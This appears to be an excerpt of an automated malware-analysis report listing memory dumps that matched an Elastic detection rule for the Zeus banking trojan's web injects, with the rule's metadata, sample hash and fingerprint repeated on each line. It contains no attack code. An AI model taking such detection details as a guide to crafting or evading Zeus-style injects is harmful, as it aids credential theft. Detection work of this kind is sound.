Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
